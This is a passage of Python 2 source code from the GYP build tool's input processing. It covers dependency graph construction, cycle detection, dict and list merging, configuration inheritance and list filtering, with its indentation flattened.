dependency = gyp.common.QualifiedTarget(dep_file,
dep_target,
dep_toolset)
dependencies[index] = dependency
# Make sure anything appearing in a list other than "dependencies" also
# appears in the "dependencies" list.
if dependency_key != 'dependencies' and \
dependency not in target_dict['dependencies']:
raise KeyError, 'Found ' + dependency + ' in ' + dependency_key + \
' of ' + target + ', but not in dependencies'
def ExpandWildcardDependencies(targets, data):
"""Expands dependencies specified as build_file:*.
For each target in |targets|, examines sections containing links to other
targets. If any such section contains a link of the form build_file:*, it
is taken as a wildcard link, and is expanded to list each target in
build_file. The |data| dict provides access to build file dicts.
Any target that does not wish to be included by wildcard can provide an
optional "suppress_wildcard" key in its target dict. When present and
true, a wildcard dependency link will not include such targets.
All dependency names, including the keys to |targets| and the values in each
dependency list, must be qualified when this function is called.
"""
for target, target_dict in targets.iteritems():
toolset = target_dict['toolset']
target_build_file = gyp.common.BuildFile(target)
for dependency_key in dependency_sections:
dependencies = target_dict.get(dependency_key, [])
# Loop this way instead of "for dependency in" or "for index in xrange"
# because the dependencies list will be modified within the loop body.
index = 0
while index < len(dependencies):
(dependency_build_file, dependency_target, dependency_toolset) = \
gyp.common.ParseQualifiedTarget(dependencies[index])
if dependency_target != '*' and dependency_toolset != '*':
# Not a wildcard. Keep it moving.
index = index + 1
continue
if dependency_build_file == target_build_file:
# It's an error for a target to depend on all other targets in
# the same file, because a target cannot depend on itself.
raise KeyError, 'Found wildcard in ' + dependency_key + ' of ' + \
target + ' referring to same build file'
# Take the wildcard out and adjust the index so that the next
# dependency in the list will be processed the next time through the
# loop.
del dependencies[index]
index = index - 1
# Loop through the targets in the other build file, adding them to
# this target's list of dependencies in place of the removed
# wildcard.
dependency_target_dicts = data[dependency_build_file]['targets']
for dependency_target_dict in dependency_target_dicts:
if int(dependency_target_dict.get('suppress_wildcard', False)):
continue
dependency_target_name = dependency_target_dict['target_name']
if (dependency_target != '*' and
dependency_target != dependency_target_name):
continue
dependency_target_toolset = dependency_target_dict['toolset']
if (dependency_toolset != '*' and
dependency_toolset != dependency_target_toolset):
continue
dependency = gyp.common.QualifiedTarget(dependency_build_file,
dependency_target_name,
dependency_target_toolset)
index = index + 1
dependencies.insert(index, dependency)
index = index + 1
class DependencyGraphNode(object):
"""
Attributes:
ref: A reference to an object that this DependencyGraphNode represents.
dependencies: List of DependencyGraphNodes on which this one depends.
dependents: List of DependencyGraphNodes that depend on this one.
"""
class CircularException(Exception):
pass
def __init__(self, ref):
self.ref = ref
self.dependencies = []
self.dependents = []
def FlattenToList(self):
# flat_list is the sorted list of dependencies - actually, the list items
# are the "ref" attributes of DependencyGraphNodes. Every target will
# appear in flat_list after all of its dependencies, and before all of its
# dependents.
flat_list = []
# in_degree_zeros is the list of DependencyGraphNodes that have no
# dependencies not in flat_list. Initially, it is a copy of the children
# of this node, because when the graph was built, nodes with no
# dependencies were made implicit dependents of the root node.
in_degree_zeros = self.dependents[:]
while in_degree_zeros:
# Nodes in in_degree_zeros have no dependencies not in flat_list, so they
# can be appended to flat_list. Take these nodes out of in_degree_zeros
# as work progresses, so that the next node to process from the list can
# always be accessed at a consistent position.
node = in_degree_zeros.pop(0)
flat_list.append(node.ref)
# Look at dependents of the node just added to flat_list. Some of them
# may now belong in in_degree_zeros.
for node_dependent in node.dependents:
is_in_degree_zero = True
for node_dependent_dependency in node_dependent.dependencies:
if not node_dependent_dependency.ref in flat_list:
# The dependent one or more dependencies not in flat_list. There
# will be more chances to add it to flat_list when examining
# it again as a dependent of those other dependencies, provided
# that there are no cycles.
is_in_degree_zero = False
break
if is_in_degree_zero:
# All of the dependent's dependencies are already in flat_list. Add
# it to in_degree_zeros where it will be processed in a future
# iteration of the outer loop.
in_degree_zeros.append(node_dependent)
return flat_list
def DirectDependencies(self, dependencies=None):
"""Returns a list of just direct dependencies."""
if dependencies == None:
dependencies = []
for dependency in self.dependencies:
# Check for None, corresponding to the root node.
if dependency.ref != None and dependency.ref not in dependencies:
dependencies.append(dependency.ref)
return dependencies
def _AddImportedDependencies(self, targets, dependencies=None):
"""Given a list of direct dependencies, adds indirect dependencies that
other dependencies have declared to export their settings.
This method does not operate on self. Rather, it operates on the list
of dependencies in the |dependencies| argument. For each dependency in
that list, if any declares that it exports the settings of one of its
own dependencies, those dependencies whose settings are "passed through"
are added to the list. As new items are added to the list, they too will
be processed, so it is possible to import settings through multiple levels
of dependencies.
This method is not terribly useful on its own, it depends on being
"primed" with a list of direct dependencies such as one provided by
DirectDependencies. DirectAndImportedDependencies is intended to be the
public entry point.
"""
if dependencies == None:
dependencies = []
index = 0
while index < len(dependencies):
dependency = dependencies[index]
dependency_dict = targets[dependency]
# Add any dependencies whose settings should be imported to the list
# if not already present. Newly-added items will be checked for
# their own imports when the list iteration reaches them.
# Rather than simply appending new items, insert them after the
# dependency that exported them. This is done to more closely match
# the depth-first method used by DeepDependencies.
add_index = 1
for imported_dependency in \
dependency_dict.get('export_dependent_settings', []):
if imported_dependency not in dependencies:
dependencies.insert(index + add_index, imported_dependency)
add_index = add_index + 1
index = index + 1
return dependencies
def DirectAndImportedDependencies(self, targets, dependencies=None):
"""Returns a list of a target's direct dependencies and all indirect
dependencies that a dependency has advertised settings should be exported
through the dependency for.
"""
dependencies = self.DirectDependencies(dependencies)
return self._AddImportedDependencies(targets, dependencies)
def DeepDependencies(self, dependencies=None):
"""Returns a list of all of a target's dependencies, recursively."""
if dependencies == None:
dependencies = []
for dependency in self.dependencies:
# Check for None, corresponding to the root node.
if dependency.ref != None and dependency.ref not in dependencies:
dependencies.append(dependency.ref)
dependency.DeepDependencies(dependencies)
return dependencies
def LinkDependencies(self, targets, dependencies=None, initial=True):
"""Returns a list of dependency targets that are linked into this target.
This function has a split personality, depending on the setting of
|initial|. Outside callers should always leave |initial| at its default
setting.
When adding a target to the list of dependencies, this function will
recurse into itself with |initial| set to False, to collect depenedencies
that are linked into the linkable target for which the list is being built.
"""
if dependencies == None:
dependencies = []
# Check for None, corresponding to the root node.
if self.ref == None:
return dependencies
# It's kind of sucky that |targets| has to be passed into this function,
# but that's presently the easiest way to access the target dicts so that
# this function can find target types.
if not 'target_name' in targets[self.ref]:
raise Exception("Missing 'target_name' field in target.")
try:
target_type = targets[self.ref]['type']
except KeyError, e:
raise Exception("Missing 'type' field in target %s" %
targets[self.ref]['target_name'])
is_linkable = target_type in linkable_types
if initial and not is_linkable:
# If this is the first target being examined and it's not linkable,
# return an empty list of link dependencies, because the link
# dependencies are intended to apply to the target itself (initial is
# True) and this target won't be linked.
return dependencies
# Executables and loadable modules are already fully and finally linked.
# Nothing else can be a link dependency of them, there can only be
# dependencies in the sense that a dependent target might run an
# executable or load the loadable_module.
if not initial and target_type in ('executable', 'loadable_module'):
return dependencies
# The target is linkable, add it to the list of link dependencies.
if self.ref not in dependencies:
if target_type != 'none':
# Special case: "none" type targets don't produce any linkable products
# and shouldn't be exposed as link dependencies, although dependencies
# of "none" type targets may still be link dependencies.
dependencies.append(self.ref)
if initial or not is_linkable:
# If this is a subsequent target and it's linkable, don't look any
# further for linkable dependencies, as they'll already be linked into
# this target linkable. Always look at dependencies of the initial
# target, and always look at dependencies of non-linkables.
for dependency in self.dependencies:
dependency.LinkDependencies(targets, dependencies, False)
return dependencies
def BuildDependencyList(targets):
# Create a DependencyGraphNode for each target. Put it into a dict for easy
# access.
dependency_nodes = {}
for target, spec in targets.iteritems():
if not target in dependency_nodes:
dependency_nodes[target] = DependencyGraphNode(target)
# Set up the dependency links. Targets that have no dependencies are treated
# as dependent on root_node.
root_node = DependencyGraphNode(None)
for target, spec in targets.iteritems():
target_node = dependency_nodes[target]
target_build_file = gyp.common.BuildFile(target)
if not 'dependencies' in spec or len(spec['dependencies']) == 0:
target_node.dependencies = [root_node]
root_node.dependents.append(target_node)
else:
dependencies = spec['dependencies']
for index in xrange(0, len(dependencies)):
try:
dependency = dependencies[index]
dependency_node = dependency_nodes[dependency]
target_node.dependencies.append(dependency_node)
dependency_node.dependents.append(target_node)
except KeyError, e:
gyp.common.ExceptionAppend(e,
'while trying to load target %s' % target)
raise
flat_list = root_node.FlattenToList()
# If there's anything left unvisited, there must be a circular dependency
# (cycle). If you need to figure out what's wrong, look for elements of
# targets that are not in flat_list.
if len(flat_list) != len(targets):
raise DependencyGraphNode.CircularException, \
'Some targets not reachable, cycle in dependency graph detected'
return [dependency_nodes, flat_list]
def VerifyNoGYPFileCircularDependencies(targets):
# Create a DependencyGraphNode for each gyp file containing a target. Put
# it into a dict for easy access.
dependency_nodes = {}
for target in targets.iterkeys():
build_file = gyp.common.BuildFile(target)
if not build_file in dependency_nodes:
dependency_nodes[build_file] = DependencyGraphNode(build_file)
# Set up the dependency links.
for target, spec in targets.iteritems():
build_file = gyp.common.BuildFile(target)
build_file_node = dependency_nodes[build_file]
target_dependencies = spec.get('dependencies', [])
for dependency in target_dependencies:
try:
dependency_build_file = gyp.common.BuildFile(dependency)
if dependency_build_file == build_file:
# A .gyp file is allowed to refer back to itself.
continue
dependency_node = dependency_nodes[dependency_build_file]
if dependency_node not in build_file_node.dependencies:
build_file_node.dependencies.append(dependency_node)
dependency_node.dependents.append(build_file_node)
except KeyError, e:
gyp.common.ExceptionAppend(
e, 'while computing dependencies of .gyp file %s' % build_file)
raise
# Files that have no dependencies are treated as dependent on root_node.
root_node = DependencyGraphNode(None)
for build_file_node in dependency_nodes.itervalues():
if len(build_file_node.dependencies) == 0:
build_file_node.dependencies.append(root_node)
root_node.dependents.append(build_file_node)
flat_list = root_node.FlattenToList()
# If there's anything left unvisited, there must be a circular dependency
# (cycle).
if len(flat_list) != len(dependency_nodes):
bad_files = []
for file in dependency_nodes.iterkeys():
if not file in flat_list:
bad_files.append(file)
raise DependencyGraphNode.CircularException, \
'Some files not reachable, cycle in .gyp file dependency graph ' + \
'detected involving some or all of: ' + \
' '.join(bad_files)
def DoDependentSettings(key, flat_list, targets, dependency_nodes):
# key should be one of all_dependent_settings, direct_dependent_settings,
# or link_settings.
for target in flat_list:
target_dict = targets[target]
build_file = gyp.common.BuildFile(target)
if key == 'all_dependent_settings':
dependencies = dependency_nodes[target].DeepDependencies()
elif key == 'direct_dependent_settings':
dependencies = \
dependency_nodes[target].DirectAndImportedDependencies(targets)
elif key == 'link_settings':
dependencies = dependency_nodes[target].LinkDependencies(targets)
else:
raise KeyError, "DoDependentSettings doesn't know how to determine " + \
'dependencies for ' + key
for dependency in dependencies:
dependency_dict = targets[dependency]
if not key in dependency_dict:
continue
dependency_build_file = gyp.common.BuildFile(dependency)
MergeDicts(target_dict, dependency_dict[key],
build_file, dependency_build_file)
def AdjustStaticLibraryDependencies(flat_list, targets, dependency_nodes):
# Recompute target "dependencies" properties. For each static library
# target, remove "dependencies" entries referring to other static libraries,
# unless the dependency has the "hard_dependency" attribute set. For each
# linkable target, add a "dependencies" entry referring to all of the
# target's computed list of link dependencies (including static libraries
# if no such entry is already present.
for target in flat_list:
target_dict = targets[target]
target_type = target_dict['type']
if target_type == 'static_library':
if not 'dependencies' in target_dict:
continue
target_dict['dependencies_original'] = target_dict.get(
'dependencies', [])[:]
index = 0
while index < len(target_dict['dependencies']):
dependency = target_dict['dependencies'][index]
dependency_dict = targets[dependency]
if dependency_dict['type'] == 'static_library' and \
(not 'hard_dependency' in dependency_dict or \
not dependency_dict['hard_dependency']):
# A static library should not depend on another static library unless
# the dependency relationship is "hard," which should only be done
# when a dependent relies on some side effect other than just the
# build product, like a rule or action output. Take the dependency
# out of the list, and don't increment index because the next
# dependency to analyze will shift into the index formerly occupied
# by the one being removed.
del target_dict['dependencies'][index]
else:
index = index + 1
# If the dependencies list is empty, it's not needed, so unhook it.
if len(target_dict['dependencies']) == 0:
del target_dict['dependencies']
elif target_type in linkable_types:
# Get a list of dependency targets that should be linked into this
# target. Add them to the dependencies list if they're not already
# present.
link_dependencies = dependency_nodes[target].LinkDependencies(targets)
for dependency in link_dependencies:
if dependency == target:
continue
if not 'dependencies' in target_dict:
target_dict['dependencies'] = []
if not dependency in target_dict['dependencies']:
target_dict['dependencies'].append(dependency)
# Initialize this here to speed up MakePathRelative.
exception_re = re.compile(r'''["']?[-/$<>]''')
def MakePathRelative(to_file, fro_file, item):
# If item is a relative path, it's relative to the build file dict that it's
# coming from. Fix it up to make it relative to the build file dict that
# it's going into.
# Exception: any |item| that begins with these special characters is
# returned without modification.
# / Used when a path is already absolute (shortcut optimization;
# such paths would be returned as absolute anyway)
# $ Used for build environment variables
# - Used for some build environment flags (such as -lapr-1 in a
# "libraries" section)
# < Used for our own variable and command expansions (see ExpandVariables)
# > Used for our own variable and command expansions (see ExpandVariables)
#
# "/' Used when a value is quoted. If these are present, then we
# check the second character instead.
#
if to_file == fro_file or exception_re.match(item):
return item
else:
# TODO(dglazkov) The backslash/forward-slash replacement at the end is a
# temporary measure. This should really be addressed by keeping all paths
# in POSIX until actual project generation.
ret = os.path.normpath(os.path.join(
gyp.common.RelativePath(os.path.dirname(fro_file),
os.path.dirname(to_file)),
item)).replace('\\', '/')
if item[-1] == '/':
ret += '/'
return ret
def MergeLists(to, fro, to_file, fro_file, is_paths=False, append=True):
prepend_index = 0
for item in fro:
singleton = False
if isinstance(item, str) or isinstance(item, int):
# The cheap and easy case.
if is_paths:
to_item = MakePathRelative(to_file, fro_file, item)
else:
to_item = item
if not isinstance(item, str) or not item.startswith('-'):
# Any string that doesn't begin with a "-" is a singleton - it can
# only appear once in a list, to be enforced by the list merge append
# or prepend.
singleton = True
elif isinstance(item, dict):
# Make a copy of the dictionary, continuing to look for paths to fix.
# The other intelligent aspects of merge processing won't apply because
# item is being merged into an empty dict.
to_item = {}
MergeDicts(to_item, item, to_file, fro_file)
elif isinstance(item, list):
# Recurse, making a copy of the list. If the list contains any
# descendant dicts, path fixing will occur. Note that here, custom
# values for is_paths and append are dropped; those are only to be
# applied to |to| and |fro|, not sublists of |fro|. append shouldn't
# matter anyway because the new |to_item| list is empty.
to_item = []
MergeLists(to_item, item, to_file, fro_file)
else:
raise TypeError, \
'Attempt to merge list item of unsupported type ' + \
item.__class__.__name__
if append:
# If appending a singleton that's already in the list, don't append.
# This ensures that the earliest occurrence of the item will stay put.
if not singleton or not to_item in to:
to.append(to_item)
else:
# If prepending a singleton that's already in the list, remove the
# existing instance and proceed with the prepend. This ensures that the
# item appears at the earliest possible position in the list.
while singleton and to_item in to:
to.remove(to_item)
# Don't just insert everything at index 0. That would prepend the new
# items to the list in reverse order, which would be an unwelcome
# surprise.
to.insert(prepend_index, to_item)
prepend_index = prepend_index + 1
def MergeDicts(to, fro, to_file, fro_file):
# I wanted to name the parameter "from" but it's a Python keyword...
for k, v in fro.iteritems():
# It would be nice to do "if not k in to: to[k] = v" but that wouldn't give
# copy semantics. Something else may want to merge from the |fro| dict
# later, and having the same dict ref pointed to twice in the tree isn't
# what anyone wants considering that the dicts may subsequently be
# modified.
if k in to:
bad_merge = False
if isinstance(v, str) or isinstance(v, int):
if not (isinstance(to[k], str) or isinstance(to[k], int)):
bad_merge = True
elif v.__class__ != to[k].__class__:
bad_merge = True
if bad_merge:
raise TypeError, \
'Attempt to merge dict value of type ' + v.__class__.__name__ + \
' into incompatible type ' + to[k].__class__.__name__ + \
' for key ' + k
if isinstance(v, str) or isinstance(v, int):
# Overwrite the existing value, if any. Cheap and easy.
is_path = IsPathSection(k)
if is_path:
to[k] = MakePathRelative(to_file, fro_file, v)
else:
to[k] = v
elif isinstance(v, dict):
# Recurse, guaranteeing copies will be made of objects that require it.
if not k in to:
to[k] = {}
MergeDicts(to[k], v, to_file, fro_file)
elif isinstance(v, list):
# Lists in dicts can be merged with different policies, depending on
# how the key in the "from" dict (k, the from-key) is written.
#
# If the from-key has ...the to-list will have this action
# this character appended:... applied when receiving the from-list:
# = replace
# + prepend
# ? set, only if to-list does not yet exist
# (none) append
#
# This logic is list-specific, but since it relies on the associated
# dict key, it's checked in this dict-oriented function.
ext = k[-1]
append = True
if ext == '=':
list_base = k[:-1]
lists_incompatible = [list_base, list_base + '?']
to[list_base] = []
elif ext == '+':
list_base = k[:-1]
lists_incompatible = [list_base + '=', list_base + '?']
append = False
elif ext == '?':
list_base = k[:-1]
lists_incompatible = [list_base, list_base + '=', list_base + '+']
else:
list_base = k
lists_incompatible = [list_base + '=', list_base + '?']
# Some combinations of merge policies appearing together are meaningless.
# It's stupid to replace and append simultaneously, for example. Append
# and prepend are the only policies that can coexist.
for list_incompatible in lists_incompatible:
if list_incompatible in fro:
raise KeyError, 'Incompatible list policies ' + k + ' and ' + \
list_incompatible
if list_base in to:
if ext == '?':
# If the key ends in "?", the list will only be merged if it doesn't
# already exist.
continue
if not isinstance(to[list_base], list):
# This may not have been checked above if merging in a list with an
# extension character.
raise TypeError, \
'Attempt to merge dict value of type ' + v.__class__.__name__ + \
' into incompatible type ' + to[list_base].__class__.__name__ + \
' for key ' + list_base + '(' + k + ')'
else:
to[list_base] = []
# Call MergeLists, which will make copies of objects that require it.
# MergeLists can recurse back into MergeDicts, although this will be
# to make copies of dicts (with paths fixed), there will be no
# subsequent dict "merging" once entering a list because lists are
# always replaced, appended to, or prepended to.
is_paths = IsPathSection(list_base)
MergeLists(to[list_base], v, to_file, fro_file, is_paths, append)
else:
raise TypeError, \
'Attempt to merge dict value of unsupported type ' + \
v.__class__.__name__ + ' for key ' + k
def MergeConfigWithInheritance(new_configuration_dict, build_file,
target_dict, configuration, visited):
# Skip if previously visted.
if configuration in visited:
return
# Look at this configuration.
configuration_dict = target_dict['configurations'][configuration]
# Merge in parents.
for parent in configuration_dict.get('inherit_from', []):
MergeConfigWithInheritance(new_configuration_dict, build_file,
target_dict, parent, visited + [configuration])
# Merge it into the new config.
MergeDicts(new_configuration_dict, configuration_dict,
build_file, build_file)
# Drop abstract.
if 'abstract' in new_configuration_dict:
del new_configuration_dict['abstract']
def SetUpConfigurations(target, target_dict):
global non_configuration_keys
# key_suffixes is a list of key suffixes that might appear on key names.
# These suffixes are handled in conditional evaluations (for =, +, and ?)
# and rules/exclude processing (for ! and /). Keys with these suffixes
# should be treated the same as keys without.
key_suffixes = ['=', '+', '?', '!', '/']
build_file = gyp.common.BuildFile(target)
# Provide a single configuration by default if none exists.
# TODO(mark): Signal an error if default_configurations exists but
# configurations does not.
if not 'configurations' in target_dict:
target_dict['configurations'] = {'Default': {}}
if not 'default_configuration' in target_dict:
concrete = [i for i in target_dict['configurations'].keys()
if not target_dict['configurations'][i].get('abstract')]
target_dict['default_configuration'] = sorted(concrete)[0]
for configuration in target_dict['configurations'].keys():
old_configuration_dict = target_dict['configurations'][configuration]
# Skip abstract configurations (saves work only).
if old_configuration_dict.get('abstract'):
continue
# Configurations inherit (most) settings from the enclosing target scope.
# Get the inheritance relationship right by making a copy of the target
# dict.
new_configuration_dict = copy.deepcopy(target_dict)
# Take out the bits that don't belong in a "configurations" section.
# Since configuration setup is done before conditional, exclude, and rules
# processing, be careful with handling of the suffix characters used in
# those phases.
delete_keys = []
for key in new_configuration_dict:
key_ext = key[-1:]
if key_ext in key_suffixes:
key_base = key[:-1]
else:
key_base = key
if key_base in non_configuration_keys:
delete_keys.append(key)
for key in delete_keys:
del new_configuration_dict[key]
# Merge in configuration (with all its parents first).
MergeConfigWithInheritance(new_configuration_dict, build_file,
target_dict, configuration, [])
# Put the new result back into the target dict as a configuration.
target_dict['configurations'][configuration] = new_configuration_dict
# Now drop all the abstract ones.
for configuration in target_dict['configurations'].keys():
old_configuration_dict = target_dict['configurations'][configuration]
if old_configuration_dict.get('abstract'):
del target_dict['configurations'][configuration]
# Now that all of the target's configurations have been built, go through
# the target dict's keys and remove everything that's been moved into a
# "configurations" section.
delete_keys = []
for key in target_dict:
key_ext = key[-1:]
if key_ext in key_suffixes:
key_base = key[:-1]
else:
key_base = key
if not key_base in non_configuration_keys:
delete_keys.append(key)
for key in delete_keys:
del target_dict[key]
# Check the configurations to see if they contain invalid keys.
for configuration in target_dict['configurations'].keys():
configuration_dict = target_dict['configurations'][configuration]
for key in configuration_dict.keys():
if key in invalid_configuration_keys:
raise KeyError, ('%s not allowed in the %s configuration, found in '
'target %s' % (key, configuration, target))
def ProcessListFiltersInDict(name, the_dict):
"""Process regular expression and exclusion-based filters on lists.
An exclusion list is in a dict key named with a trailing "!", like
"sources!". Every item in such a list is removed from the associated
main list, which in this example, would be "sources". Removed items are
placed into a "sources_excluded" list in the dict.
Regular expression (regex) filters are contained in dict keys named with a
trailing "/", such as "sources/" to operate on the "sources" list. Regex
filters in a dict take the form:
'sources/': [ ['exclude', '_(linux|mac|win)\\.cc$'] ],
['include', '_mac\\.cc$'] ],
The first filter says to exclude all files ending in _linux.cc, _mac.cc, and
_win.cc. The second filter then includes all files ending in _mac.cc that
are now or were once in the "sources" list. Items matching an "exclude"
filter are subject to the same processing as would occur if they were listed
by name in an exclusion list (ending in "!"). Items matching an "include"
filter are brought back into the main list if previously excluded by an
exclusion list or exclusion regex filter. Subsequent matching "exclude"
patterns can still cause items to be excluded after matching an "include".
"""
# Look through the dictionary for any lists whose keys end in "!" or "/".
# These are lists that will be treated as exclude lists and regular
# expression-based exclude/include lists. Collect the lists that are
# needed first, looking for the lists that they operate on, and assemble
# then into |lists|. This is done in a separate loop up front, because
# the _included and _excluded keys need to be added to the_dict, and that
# can't be done while iterating through it.
lists = []
del_lists = []
for key, value in the_dict.iteritems():
operation = key[-1]
if operation != '!' and operation != '/':
continue
if not isinstance(value, list):
raise ValueError, name + ' key ' + key + ' must be list, not ' + \
value.__class__.__name__
list_key = key[:-1]
if list_key not in the_dict:
# This happens when there's a list like "sources!" but no corresponding
# "sources" list. Since there's nothing for it to operate on, queue up
# the "sources!" list for deletion now.
del_lists.append(key)
continue
if not isinstance(the_dict[list_key], list):
raise ValueError, name + ' key ' + list_key + \
' must be list, not ' + \
value.__class__.__name__ + ' when applying ' + \
{'!': 'exclusion', '/': 'regex'}[operation]
if not list_key in lists:
lists.append(list_key)
# Delete the lists that are known to be unneeded at this point.
for del_list in del_lists:
del the_dict[del_list]
for list_key in lists:
the_list = the_dict[list_key]
# Initialize the list_actions list, which is parallel to the_list. Each
# item in list_actions identifies whether the corresponding item in
# the_list should be excluded, unconditionally preserved (included), or
# whether no exclusion or inclusion has been applied. Items for which
# no exclusion or inclusion has been applied (yet) have value -1, items
# excluded have value 0, and items included have value 1. Includes and
# excludes override previous actions. All items in list_actions are
# initialized to -1 because no excludes or includes have been processed
# yet.
list_actions = list((-1,) * len(the_list))
exclude_key = list_key + '!'
if exclude_key in the_dict:
for exclude_item in the_dict[exclude_key]:
for index in xrange(0, len(the_list)):
if exclude_item == the_list[index]:
# This item matches the exclude_item, so set its action to 0
# (exclude).
list_actions[index] = 0
# The "whatever!" list is no longer needed, dump it.
del the_dict[exclude_key]
regex_key = list_key + '/'
if regex_key in the_dict:
for regex_item in the_dict[regex_key]:
[action, pattern] = regex_item
pattern_re = re.compile(pattern)
for index in xrange(0, len(the_list)):
list_item = the_list[index]
if pattern_re.search(list_item):
# Regular expression match.
if action == 'exclude':
# This item matches an exclude regex, so set its value to 0
# (exclude).
list_actions[index] = 0
elif action == 'include':
# This item matches an include regex, so set its value to 1
# (include).
list_actions[index] = 1
else:
# This is an action that doesn't make any sense.
raise ValueError, 'Unrecognized action ' + action + ' in ' + \
name + ' key ' + key
# The "whatever/" list is no longer needed, dump it.
del the_dict[regex_key]
# Add excluded items to the excluded list.
#
# Note that exclude_key ("sources!") is different from excluded_key
# ("sources_excluded"). The exclude_key list is input and it was already
# processed and deleted; the excluded_key list is output and it's about
# to be created.
excluded_key = list_key + '_excluded'
if excluded_key in the_dict:
raise KeyError, \
name + ' key ' + excluded_key + ' must not be present prior ' + \
' to applying exclusion/regex filters for ' + list_key
excluded_list = []
# Go backwards through the list_actions list so that as items are deleted,
# the indices of items that haven't been seen yet don't shift. That means
# that things need to be prepended to excluded_list to maintain them in the
# same order that they existed in the_list.
for index in xrange(len(list_actions) - 1, -1, -1):
if list_actions[index] == 0:
# Dump anything with action 0 (exclude). Keep anything with action 1
# (include) or -1 (no include or exclude seen for the item).
excluded_list.insert(0, the_list[index])
del the_list[index]
# If anything was excluded, put the excluded list into the_dict at
# excluded_key.
if len(excluded_list) > 0:
the_dict[excluded_key] = excluded_list
# Now recurse into subdicts and lists that may contain dicts.
for key, value in the_dict.iteritems():
if isinstance(value, dict):
ProcessListFiltersInDict(key, value)
elif isinstance(value, list):
ProcessListFiltersInList(key, value)
def ProcessListFiltersInList(name, the_list):
for item in the_list:
if isinstance(item, dict):
ProcessListFiltersInDict(name, item)
elif isinstance(item, list):
ProcessListFiltersInList(name, item)
def ValidateRulesInTarget(target, target_dict, extra_sources_for_rules):
"""Ensures that the rules sections in target_dict are valid and consistent,
and determines which sources they apply to.
Arguments:
target: string, name of target.
target_dict: dict, target spec containing "rules" and "sources" lists.
extra_sources_for_rules: a list of keys to scan for rule matches in
addition to 'sources'.
"""
# Dicts to map between values found in rules' 'rule_name' and 'extension'
# keys and the rule dicts themselves.
rule_names = {}
rule_extensions = {}
rules = target_dict.get('rules', [])
for rule in rules:
# Make sure that there's no conflict among rule names and extensions.
rule_name = rule['rule_name']
if rule_name in rule_names:
raise KeyError, 'rule %s exists in duplicate, target %s' % \
(rule_name, target)
rule_names[rule_name] = rule
rule_extension = rule['extension']
if rule_extension in rule_extensions:
raise KeyError, ('extension %s associated with multiple rules, ' +
'target %s rules %s and %s') % \
(rule_extension, target,
rule_extensions[rule_extension]['rule_name'],
rule_name)
rule_extensions[rule_extension] = rule
# Make sure rule_sources isn't already there. It's going to be
# created below if needed.
if 'rule_sources' in rule:
raise KeyError, \
'rule_sources must not exist in input, target %s rule %s' % \
(target, rule_name)
extension = rule['extension']
rule_sources = []
source_keys = ['sources']
source_keys.extend(extra_sources_for_rules)
for source_key in source_keys:
for source in target_dict.get(source_key, []):
(source_root, source_extension) = os.path.splitext(source)
if source_extension.startswith('.'):
source_extension = source_extension[1:]
if source_extension == extension:
rule_sources.append(source)
if len(rule_sources) > 0:
rule['rule_sources'] = rule_sources
def ValidateActionsInTarget(target, target_dict, build_file):
'''Validates the inputs to the actions in a target.'''
target_name = target_dict.get('target_name')
actions = target_dict.get('actions', [])
for action in actions:
action_name = action.get('action_name')
if not action_name:
raise Exception("Anonymous action in target %s. "
"An action must have an 'action_name' field." %
target_name)
inputs = action.get('inputs', [])
def ValidateRunAsInTarget(target, target_dict, build_file):
target_name = target_dict.get('target_name')
run_as = target_dict.get('run_as')
if not run_as:
return
if not isinstance(run_as, dict):
raise Exception("The 'run_as' in target %s from file %s should be a "
"dictionary." %
(target_name, build_file))
action = run_as.get('action')
if not action:
raise Exception("The 'run_as' in target %s from file %s must have an "
"'action' section." %
(target_name, build_file))
if not isinstance(action, list):
raise Exception("The 'action' for 'run_as' in target %s from file %s "
"must be a list." %
(target_name, build_file))
working_directory = run_as.get('working_directory')
if working_directory and not isinstance(working_directory, str):
raise Exception("The 'working_directory' for 'run_as' in target %s "
"in file %s should be a string." %
(target_name, build_file))
environment = run_as.get('environment')
if environment and not isinstance(environment, dict):
raise Exception("The 'environment' for 'run_as' in target %s "
"in file %s should be a dictionary." %
(target_name, build_file))
def TurnIntIntoStrInDict(the_dict):
"""Given dict the_dict, recursively converts all integers into strings.
"""
# Use items instead of iteritems because there's no need to try to look at
# reinserted keys and their associated values.
for k, v in the_dict.items():
if isinstance(v, int):
v = str(v)
the_dict[k] = v
elif isinstance(v, dict):
TurnIntIntoStrInDict(v)
elif isinstance(v, list):
TurnIntIntoStrInList(v)
if isinstance(k, int):
the_dict[str(k)] = v
del the_dict[k]
def TurnIntIntoStrInList(the_list):
"""Given list the_list, recursively converts all integers into strings.
"""
for index in xrange(0, len(the_list)):
item = the_list[index]
if isinstance(item, int):
the_list[index] = str(item)
elif isinstance(item, dict):
TurnIntIntoStrInDict(item)
elif isinstance(item, list):
TurnIntIntoStrInList(item)
def VerifyNoCollidingTargets(targets):
"""Verify that no two targets in the same directory share the same name.
Arguments:
targets: A list of targets in the form 'path/to/file.gyp:target_name'.
"""
# Keep a dict going from 'subdirectory:target_name' to 'foo.gyp'.
used = {}
for target in targets:
# Separate out 'path/to/file.gyp, 'target_name' from
# 'path/to/file.gyp:target_name'.
path, name = target.split(':')
# Separate out 'path/to', 'file.gyp' from 'path/to/file.gyp'.
subdir, gyp = os.path.split(path)
# Use '.' for the current directory '', so that the error messages make
# more sense.
if not subdir:
subdir = '.'
# Prepare a key like 'path/to:target_name'.
key = subdir + ':' + name
if key in used:
# Complain if this target is already used.
raise Exception('Duplicate target name "%s" in directory "%s" used both '
'in "%s" and "%s".' % (name, subdir, gyp, used[key]))
used[key] = gyp
def Load(build_files, variables, includes, depth, generator_input_info, check,
circular_check):
# Set up path_sections and non_configuration_keys with the default data plus
# the generator-specifc data.
global path_sections
path_sections = base_path_sections[:]
path_sections.extend(generator_input_info['path_sections'])
global non_configuration_keys
non_configuration_keys = base_non_configuration_keys[:]
non_configuration_keys.extend(generator_input_info['non_configuration_keys'])
# TODO(mark) handle variants if the generator doesn't want them directly.
generator_handles_variants = \
generator_input_info['generator_handles_variants']
global absolute_build_file_paths
absolute_build_file_paths = \
generator_input_info['generator_wants_absolute_build_file_paths']
global multiple_toolsets
multiple_toolsets = generator_input_info[
'generator_supports_multiple_toolsets']
# A generator can have other lists (in addition to sources) be processed
# for rules.
extra_sources_for_rules = generator_input_info['extra_sources_for_rules']
# Load build files. This loads every target-containing build file into
# the |data| dictionary such that the keys to |data| are build file names,
# and the values are the entire build file contents after "early" or "pre"
# processing has been done and includes have been resolved.
# NOTE: data contains both "target" files (.gyp) and "includes" (.gypi), as
# well as meta-data (e.g. 'included_files' key). 'target_build_files' keeps
# track of the keys corresponding to "target" files.
